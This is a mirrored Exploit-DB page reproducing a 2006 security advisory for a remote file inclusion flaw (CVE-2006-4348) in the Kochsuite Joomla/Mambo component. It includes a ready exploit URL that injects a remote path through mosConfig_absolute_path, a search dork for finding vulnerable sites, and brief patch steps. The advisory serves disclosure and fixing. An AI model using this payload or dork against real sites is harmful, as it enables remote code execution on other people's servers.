- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 2215
- Проверка EDB
-
- Пройдено
- Автор
- CAMINO
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2006-4348
- Дата публикации
- 2006-08-18
Код:
.:[ insecurity research team ]:.
.__..____.:.______.____.:.____ .
.:. | |/ \:/ ___// __ \:/ _\.:.
: | | | \\____\\ ___/\ /__ :. .
..: |__|___| /____ >\___ >\___ >.:
.:.. .. .\/ .:\/:. .\/. .:\/:
. ...:. .advisory. .:...
:..................: 18.o8.2oo6 ..
Affected Application: Kochsuite v0.9.4
(Mambo/Joomla CMS Component)
. . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
Discoverd by: camino
Team: Insecurity Research Team
URL: http://www.insecurityresearch.org
E-Mail: camino[at]sexmagnet[dot]com
. . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
Typ: Remote [x] Local [ ]
Remote File Inclusion [x] SQL Injection [ ]
Level: Low [ ] Middle [x] High [ ]
Application: Kochsuite
Version: 0.9.4
Vulnerable File: config.kochsuite.php
URL: http://www.vegisto.com
Description: It's a component for chiefs to publish theirs stuff...
Dork: inurl:"com_kochsuite"
. . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
http://[sitepath]/[joomlapath]/administrator/components/com_kochsuite/config.kochsuite.php?mosConfig_absolute_path=http://huh?
. . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
o1.) open config.kochsuite.php
o2.) take a look at line 46:
# Don't allow direct linking defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
o3.) take a look at line 47:
require_once ($mosConfig_absolute_path.'/administrator/
components/com_kochsuite/includes/letters.inc');
o4.) change line 46:
defined( '_VALID_MOS' ) or
die( 'Direct Access to this location is not allowed.' );
. . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)
# milw0rm.com [2006-08-18]- Источник
- www.exploit-db.com
